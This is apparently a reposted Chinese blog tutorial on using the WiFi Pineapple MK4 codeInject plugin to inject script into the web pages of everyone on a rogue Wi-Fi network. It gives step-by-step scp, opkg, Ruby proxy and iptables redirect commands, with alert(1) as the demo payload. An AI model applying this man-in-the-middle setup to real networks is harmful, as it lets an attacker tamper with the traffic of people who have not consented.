wifipineapple插件:codeInject的使用
Posted 方方和圆圆
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了wifipineapple插件:codeInject的使用相关的知识,希望对你有一定的参考价值。
如果在中间人攻击的时候, 能在用户的网页中插入任意代码, 可以说已经完成一半了
wifipineapple有个codeInject插件, 可以让连上这个网络所有设备浏览网页的时候, 在网页中插入任意html代码
但是目前我用的wifipineapple版本是MK4, 官方很久不维护这个版本的wifipineapple
使用scp把本地的codeinject传到wifipineapple的 /pineapple/components/infusions/目录下
scp -r codeinject root@172.16.42.1:/pineapple/components/infusions
然后把opkg的源改成:
http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/packages/
执行
opkg update opkg install ruby-cgi opkg install ruby-core opkg install ruby-enc opkg install ruby-gems
cd进入 /pineapple/components/infusions/codeinject 目录,修正ruby执行socket, getAddrInfo的错误:
cp includes/install/socket.so /usr/lib/ruby/1.9/mips-linux ln -s /usb/usr/lib/ruby /usr/lib/ruby
cd进入 /pineapple/components/infusions/codeinject/includes/proxy 目录, 执行命令:
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usb/lib:/usb/usr/lib export PATH=$PATH:/usb/usr/bin:/usb/usr/sbin ruby -Kn proxy.rb --verbose --script-inject "<script>alert(1)</script>"
添加本地数据转发:
iptables -t nat -A PREROUTING -i br-lan -p tcp --destination-port 80 -j REDIRECT --to-ports 8888
此时连接上该wifi所有用户,浏览网页的时候,会弹出弹窗:1
EOF
作者: NONO
出处:http://www.cnblogs.com/diligenceday/
企业网站:http://www.idrwl.com/
开源博客:http://www.github.com/sqqihao
QQ:287101329
微信:18101055830
以上是关于wifipineapple插件:codeInject的使用的主要内容,如果未能解决你的问题,请参考以下文章
Android 插件化Hook 插件化框架 ( 创建插件应用 | 拷贝插件 APK | 初始化插件包 | 测试插件 DEX 字节码 )
Android 插件化Hook 插件化框架 ( hook 插件化原理 | 插件包管理 )
Android 插件化“ 插桩式 “ 插件化框架 ( 获取插件入口 Activity 组件 | 加载插件 Resources 资源 )